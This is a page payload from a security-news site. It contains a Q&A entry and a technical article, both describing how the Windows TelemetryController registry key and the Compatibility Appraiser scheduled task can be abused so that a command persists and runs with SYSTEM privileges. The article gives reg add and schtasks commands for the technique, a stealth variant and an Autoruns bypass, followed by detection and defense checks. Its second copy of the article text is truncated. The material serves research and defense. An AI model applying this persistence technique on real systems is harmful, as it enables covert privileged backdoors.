[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fwb0QLhcafJ_eqB-i2ViORJY4TZBO26Tx_kH1OG1_O3Y":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":39,"aiConfidence":39,"updatedAt":52,"createdAt":52,"_status":51},1166,"What are the exact steps to deploy a TelemetryController backdoor on Windows 10?","First, ensure the scheduled task **Microsoft Compatibility Appraiser** is enabled (it is by default). Next, add a registry key under `HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\TelemetryController` with a name like `fun`. Create two values: a `Command` REG_SZ pointing to your payload (e.g., `C:\\Windows\\system32\\notepad.exe`) and a `Nightly` REG_DWORD set to `1`. Finally, trigger the backdoor by running `schtasks \u002Frun \u002Ftn \"\\Microsoft\\Windows\\Application Experience\\Microsoft Compatibility Appraiser\"`. This launches `CompatTelRunner.exe` which spawns your payload with System privileges. For more tailored methods on older Windows versions, see the stable exploit approach discussed in the article.","\u003Cp>First, ensure the scheduled task **Microsoft Compatibility Appraiser** is enabled (it is by default). Next, add a registry key under `HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\TelemetryController` with a name like `fun`. Create two values: a `Command` REG_SZ pointing to your payload (e.g., `C:\\Windows\\system32\\notepad.exe`) and a `Nightly` REG_DWORD set to `1`. Finally, trigger the backdoor by running `schtasks \u002Frun \u002Ftn &quot;\\Microsoft\\Windows\\Application Experience\\Microsoft Compatibility Appraiser&quot;`. This launches `CompatTelRunner.exe` which spawns your payload with System privileges. For more tailored methods on older Windows versions, see the stable exploit approach discussed in the article.\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fanalysis-of-backdoor-implementation-using-telemetrycontroller\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","what-are-the-exact-steps-to-deploy-a-telemetrycontroller-backdoor-on-windows-10-1777480310581","deployment, registry modification, scheduled task, trigger, System privileges, command line",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":30,"cover":31,"author":32,"views":19,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":41,"qaPairs":42,"meta":48,"updatedAt":49,"createdAt":50,"_status":51},283,"Analysis of Backdoor Implementation Using TelemetryController","analysis-of-backdoor-implementation-using-telemetrycontroller","Learn how TelemetryController is exploited for backdoor persistence on Windows, including issues on Win7\u002FServer 2012 R2 and defense tips.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>I learned a method for implementing an auto-start backdoor using TelemetryController from ABUSING WINDOWS TELEMETRY FOR PERSISTENCE. It worked fine on Windows 10, but I encountered different results when testing on Windows 7 and Server 2012 R2.\u003C\u002Fp>\u003Cp>This article will document my learning insights, analyze the exploitation methods, and provide defense recommendations.\u003C\u002Fp>\u003Cp>References:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwww.trustedsec.com\u002Fblog\u002Fabusing-windows-telemetry-for-persistence\u002F\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following topics:\u003C\u002Fp>\u003Cul>\u003Cli>Basic Knowledge\u003C\u002Fli>\u003Cli>Conventional Exploitation Methods\u003C\u002Fli>\u003Cli>Issues Encountered on Windows 7 and Server 2012 R2\u003C\u002Fli>\u003Cli>Solutions\u003C\u002Fli>\u003Cli>Exploitation Methods\u003C\u002Fli>\u003Cli>Defense Recommendations\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Basic Knowledge\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1.TelemetryController\u003C\u002Fh3>\u003Cp>The corresponding process is CompatTelRunner.exe\u003C\u002Fp>\u003Cp>CompatTelRunner.exe is known as the Windows Compatibility Telemetry Monitor. It periodically sends usage and performance data to Microsoft to improve user experience and fix potential errors.\u003C\u002Fp>\u003Cp>Typically used for compatibility checks when upgrading to Windows 10\u003C\u002Fp>\u003Cp>Launched via the scheduled task Microsoft Compatibility Appraiser\u003C\u002Fp>\u003Cp>The scheduled task Microsoft Compatibility Appraiser is enabled by default, runs automatically every other day, and also runs when any user logs in\u003C\u002Fp>\u003Ch3>2.Scheduled Task Microsoft Compatibility Appraiser\u003C\u002Fh3>\u003Ch4>(1) Viewing the scheduled task via the panel\u003C\u002Fh4>\u003Cp>Start taskschd.msc\u003C\u002Fp>\u003Cp>Navigate to Task Scheduler (Local) -&gt; Task Scheduler Library -&gt; Microsoft -&gt; Windows -&gt; Application Experience, select Microsoft Compatibility Appraiser\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770016716621_0_b305412b9c.jpeg\">\u003C\u002Fp>\u003Cp>Here you can see the detailed information of the scheduled task Microsoft Compatibility Appraiser\u003C\u002Fp>\u003Ch4>(2) View scheduled tasks via command line\u003C\u002Fh4>\u003Cp>The command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>schtasks \u002Fquery\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>If on a Chinese operating system, the following error may occur:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Error: Unable to load column resources\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770016722348_1_0a4d038a76.jpeg\">\u003C\u002Fp>\u003Cp>Check cmd encoding, execute the command: chcp\u003C\u002Fp>\u003Cp>Return result:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Active code page: 936\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Indicates using 936 Chinese GBK encoding\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770016728580_2_a36851d7c0.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Solution:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Switch to code page 437 (US) with the command: chcp 437\u003C\u002Fp>\u003Cp>Execute again: schtasks \u002Fquery\u003C\u002Fp>\u003Cp>Result is normal\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770016732409_3_9f97413145.jpeg\">\u003C\u002Fp>\u003Cp>Directly filter for Microsoft Compatibility Appraiser:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>schtasks \u002Fquery \u002Ftn \"\\Microsoft\\Windows\\Application Experience\\Microsoft Compatibility Appraiser\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Display detailed information:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>schtasks \u002Fquery \u002Ftn \"\\Microsoft\\Windows\\Application Experience\\Microsoft Compatibility Appraiser\" \u002Fv\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Modify the scheduled task status, changing from disabled to enabled:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>schtasks \u002FChange \u002FENABLE \u002Ftn \"\\Microsoft\\Windows\\Application Experience\\Microsoft Compatibility Appraiser\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch2>0x03 Common Exploitation Methods\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Modify the registry\u003C\u002Fh3>\u003Cp>Modify the registry key HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\TelemetryController\u003C\u002Fp>\u003Cp>Create a Key with any name, with the following key-value information:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Command   REG_SZ \tC:\\Windows\\system32\\notepad.exe\u003Cbr>Nightly   REG_DWORD\t1\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The above operations can be achieved via command line, with the following commands:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add \"hklm\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\TelemetryController\\fun\" \u002Fv Nightly \u002Ft REG_DWORD \u002Fd 1\u003Cbr>reg add \"hklm\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\TelemetryController\\fun\" \u002Fv Command \u002Ft REG_SZ \u002Fd \"C:\\Windows\\system32\\notepad.exe\" \u002Ff\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>A Key named 'fun' is created here\u003C\u002Fp>\u003Ch3>2. Enable the scheduled task Microsoft Compatibility Appraiser\u003C\u002Fh3>\u003Cp>You can choose to wait for the scheduled task to start\u003C\u002Fp>\u003Cp>Or force it to start with the following command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>schtasks \u002Frun \u002Ftn \"\\Microsoft\\Windows\\Application Experience\\Microsoft Compatibility Appraiser\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Backdoor triggered, on Windows 10 system, the processes CompatTelRunner.exe and notepad.exe will immediately start with System privileges\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>CompatTelRunner.exe is the parent process of notepad.exe. If the process notepad.exe is running, then the process CompatTelRunner.exe remains in a blocked state\u003C\u002Fp>\u003Ch2>0x04 Issues encountered under Win7 and Server2012R2\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>The operation method is the same as above. After starting the backdoor, two processes CompatTelRunner.exe will be launched with System privileges\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770016735794_4_ac909a7630.jpeg\">\u003C\u002Fp>\u003Cp>The command line parameters for one of the CompatTelRunner.exe processes are:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>C:\\Windows\\system32\\CompatTelRunner.exe -m:appraiser.dll -f:DoScheduledTelemetryRun -cv:4iNQvAXT40KhDrm9.1\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>This process corresponds to the registry key HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\TelemetryController\\Appraiser\u003C\u002Fp>\u003Cp>The following conclusions were drawn from actual testing:\u003C\u002Fp>\u003Col>\u003Cli>After a period of time, if the check is still not completed, the CompatTelRunner.exe process will continue running, and it will not be possible to launch the notepad.exe process with System privileges\u003C\u002Fli>\u003Cli>After a period of time, if the check is completed, the CompatTelRunner.exe process will automatically exit, and then the CompatTelRunner.exe and notepad.exe processes will be launched with System privileges\u003C\u002Fli>\u003Cli>If you choose to forcibly terminate the CompatTelRunner.exe process, similarly, the CompatTelRunner.exe and notepad.exe processes will then be launched with System privileges\u003C\u002Fli>\u003C\u002Fol>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770016739170_5_f571120315.jpeg\">\u003C\u002Fp>\u003Cp>Here we can avoid this issue and achieve stable triggering to launch the CompatTelRunner.exe and notepad.exe processes with System privileges. The method is as follows:\u003C\u002Fp>\u003Cp>Modify the Command entry in the registry key HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\TelemetryController\\Appraiser\u003C\u002Fp>\u003Cp>The default value is %windir%\\system32\\CompatTelRunner.exe -m:appraiser.dll -f:DoScheduledTelemetryRun\u003C\u002Fp>\u003Cp>Here you can choose to skip the check process, for example, by setting the value of the Command entry to empty, which will prevent the check from executing when the scheduled task starts\u003C\u002Fp>\u003Cp>To improve stealth, the Command entry can be set to %windir%\\system32\\CompatTelRunner.exe -m:appraiser.dll\u003C\u002Fp>\u003Cp>To verify whether modifying the key value affects the normal functionality of the system, you can decompile %windir%\\system32\\CompatTelRunner.exe\u003C\u002Fp>\u003Cp>The pseudocode details for launching the process are shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770016743198_6_8c567293fe.jpeg\">\u003C\u002Fp>\u003Ch2>0x05 Exploitation Method\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Prerequisites\u003C\u002Fh3>\u003Cp>Check whether the default scheduled task Microsoft Compatibility Appraiser is enabled. The query command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>schtasks \u002Fquery \u002Ftn \"\\Microsoft\\Windows\\Application Experience\\Microsoft Compatibility Appraiser\" \u002Fv\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2. Deploying the Backdoor\u003C\u002Fh3>\u003Cp>My test results on Win7, Server2012R2, and Win10 indicate that the stable exploitation method is as follows:\u003C\u002Fp>\u003Cp>Modify the Command entry in the registry key HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\TelemetryController\\Appraiser\u003C\u002Fp>\u003Cp>Set the value to C:\\WINDOWS\\system32\\cmd.exe \u002Fc notepad.exe\u003C\u002Fp>\u003Cp>The command implemented via the command line is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add \"hklm\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\TelemetryController\\Appraiser\" \u002Fv Command \u002Ft REG_EXPAND_SZ \u002Fd \"C:\\WINDOWS\\system32\\cmd.exe \u002Fc notepad.exe\" \u002Ff\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note: Command to restore the configuration\u003C\u002Fstrong>\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add \"hklm\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\TelemetryController\\Appraiser\" \u002Fv Command \u002Ft REG_EXPAND_SZ \u002Fd \"%windir%\\system32\\CompatTelRunner.exe -m:appraiser.dll -f:DoScheduledTelemetryRun\" \u002Ff\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>3. Backdoor Trigger\u003C\u002Fh3>\u003Cp>Wait for the scheduled task Microsoft Compatibility Appraiser to run\u003C\u002Fp>\u003Cp>For testing convenience, it can be forced to run with the following command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>schtasks \u002Frun \u002Ftn \"\\Microsoft\\Windows\\Application Experience\\Microsoft Compatibility Appraiser\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>4. Characteristics\u003C\u002Fh3>\u003Cp>Can bypass Autoruns detection and execute commands with System privileges\u003C\u002Fp>\u003Cp>Can also trigger in a disconnected network state\u003C\u002Fp>\u003Ch2>0x06 Defense Recommendations\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Check if the default value of the registry has been modified\u003C\u002Fh3>\u003Ch4>(1) Check the Command entry in the registry HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\TelemetryController\\Appraiser\u003C\u002Fh4>\u003Cp>The command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg query \"hklm\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\TelemetryController\\Appraiser\" \u002Fv Command\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The default value is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Command    REG_EXPAND_SZ    %windir%\\system32\\CompatTelRunner.exe -m:appraiser.dll -f:DoScheduledTelemetryRun\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(2) Check the Keys under the registry HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\TelemetryController\u003C\u002Fh4>\u003Cp>The command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg query \"hklm\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\TelemetryController\\\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The default values are as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\TelemetryController\\Appraiser\u003Cbr>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\TelemetryController\\AppraiserServer\u003Cbr>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\TelemetryController\\AvStatus\u003Cbr>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\TelemetryController\\Census\u003Cbr>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\TelemetryController\\CensusServer\u003Cbr>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\TelemetryController\\InvAgent\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2. Disable the scheduled task Microsoft Compatibility Appraiser\u003C\u002Fh3>\u003Cp>The command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>schtasks \u002FChange \u002FDISABLE \u002Ftn \"\\Microsoft\\Windows\\Application Experience\\Microsoft Compatibility Appraiser\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>3. View information about the process CompatTelRunner.exe\u003C\u002Fh3>\u003Cp>Analyze whether there are suspicious child processes under the process CompatTelRunner.exe\u003C\u002Fp>\u003Ch2>0x07 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article documents my learning insights into the TelemetryController backdoor mechanism, summarizes a more general exploitation method, and provides targeted defense recommendations.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>I learned a method for implementing an auto-start backdoor using TelemetryController from ABUSING WINDOWS TELEMETRY FOR PERSISTENCE. It worked fine on Windows 10, but I encountered different results when testing on Windows 7 and Server 2012 R2.\u003C\u002Fp>\u003Cp>This article will document my learning insights, analyze the exploitation methods, and provide defense recommendations.\u003C\u002Fp>\u003Cp>References:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwww.trustedsec.com\u002Fblog\u002Fabusing-windows-telemetry-for-persistence\u002F\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following topics:\u003C\u002Fp>\u003Cul>\u003Cli>Basic Knowledge\u003C\u002Fli>\u003Cli>Conventional Exploitation Methods\u003C\u002Fli>\u003Cli>Issues Encountered on Windows 7 and Server 2012 R2\u003C\u002Fli>\u003Cli>Solutions\u003C\u002Fli>\u003Cli>Exploitation Methods\u003C\u002Fli>\u003Cli>Defense Recommendations\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Basic Knowledge\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1.TelemetryController\u003C\u002Fh3>\u003Cp>The corresponding process is CompatTelRunner.exe\u003C\u002Fp>\u003Cp>CompatTelRunner.exe is known as the Windows Compatibility Telemetry Monitor. It periodically sends usage and performance data to Microsoft to improve user experience and fix potential errors.\u003C\u002Fp>\u003Cp>Typically used for compatibility checks when upgrading to Windows 10\u003C\u002Fp>\u003Cp>Launched via the scheduled task Microsoft Compatibility Appraiser\u003C\u002Fp>\u003Cp>The scheduled task Microsoft Compatibility Appraiser is enabled by default, runs automatically every other day, and also runs when any user logs in\u003C\u002Fp>\u003Ch3>2.Scheduled Task Microsoft Compatibility Appraiser\u003C\u002Fh3>\u003Ch4>(1) Viewing the scheduled task via the panel\u003C\u002Fh4>\u003Cp>Start taskschd.msc\u003C\u002Fp>\u003Cp>Navigate to Task Scheduler (Local) -&gt; Task Scheduler Library -&gt; Microsoft -&gt; Windows -&gt; Application Experience, select Microsoft Compatibility Appraiser\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770016716621_0_b305412b9c-1.jpeg\">\u003C\u002Fp>\u003Cp>Here you can see the detailed information of the scheduled task Microsoft Compatibility Appraiser\u003C\u002Fp>\u003Ch4>(2) View scheduled tasks via command line\u003C\u002Fh4>\u003Cp>The command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>schtasks \u002Fquery\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>If on a Chinese operating system, the following error may occur:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Error: Unable to load column resources\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770016722348_1_0a4d038a76-1.jpeg\">\u003C\u002Fp>\u003Cp>Check cmd encoding, execute the command: chcp\u003C\u002Fp>\u003Cp>Return result:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Active code page: 936\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Indicates using 936 Chinese GBK encoding\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770016728580_2_a36851d7c0-1.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Solution:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Switch to code page 437 (US) with the command: chcp 437\u003C\u002Fp>\u003Cp>Execute again: schtasks \u002Fquery\u003C\u002Fp>\u003Cp>Result is normal\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770016732409_3_9f97413145-1.jpeg\">\u003C\u002Fp>\u003Cp>Directly filter for Microsoft Compatibility Appraiser:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>schtasks \u002Fquery \u002Ftn \"\\Microsoft\\Windows\\Application Experience\\Microsoft Compatibility Appraiser\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Display detailed information:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>schtasks \u002Fquery \u002Ftn \"\\Microsoft\\Windows\\Application Experience\\Microsoft Compatibility Appraiser\" \u002Fv\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Modify the scheduled task status, changing from disabled to enabled:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>schtasks \u002FChange \u002FENABLE \u002Ftn \"\\Microsoft\\Windows\\Application Experience\\Microsoft Compatibility Appraiser\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch2>0x03 Common Exploitation Methods\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Modify the registry\u003C\u002Fh3>\u003Cp>Modify the registry key HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\TelemetryController\u003C\u002Fp>\u003Cp>Create a Key with any name, with the following key-value information:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Command   REG_SZ \tC:\\Windows\\system32\\notepad.exe\u003Cbr>Nightly   REG_DWORD\t1\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The above operations can be achieved via command line, with the following commands:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add \"hklm\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\TelemetryController\\fun\" \u002Fv Nightly \u002Ft REG_DWORD \u002Fd 1\u003Cbr>reg add \"hklm\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\TelemetryController\\fun\" \u002Fv Command \u002Ft REG_SZ \u002Fd \"C:\\Windows\\system32\\notepad.exe\" \u002Ff\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>A Key named 'fun' is created here\u003C\u002Fp>\u003Ch3>2. Enable the scheduled task Microsoft Compatibility Appraiser\u003C\u002Fh3>\u003Cp>You can choose to wait for the scheduled task to start\u003C\u002Fp>\u003Cp>Or force it to start with the following command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>schtasks \u002Frun \u002Ftn \"\\Microsoft\\Windows\\Application Experience\\Microsoft Compatibility Appraiser\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Backdoor triggered, on Windows 10 system, the processes CompatTelRunner.exe and notepad.exe will immediately start with System privileges\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>CompatTelRunner.exe is the parent process of notepad.exe. If the process notepad.exe is running, then the process CompatTelRunner.exe remains in a blocked state\u003C\u002Fp>\u003Ch2>0x04 Issues encountered under Win7 and Server2012R2\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>The operation method is the same as above. After starting the backdoor, two processes CompatTelRunner.exe will be launched with System privileges\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770016735794_4_ac909a7630-1.jpeg\">\u003C\u002Fp>\u003Cp>The command line parameters for one of the CompatTelRunner.exe processes are:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>C:\\Windows\\system32\\CompatTelRunner.exe 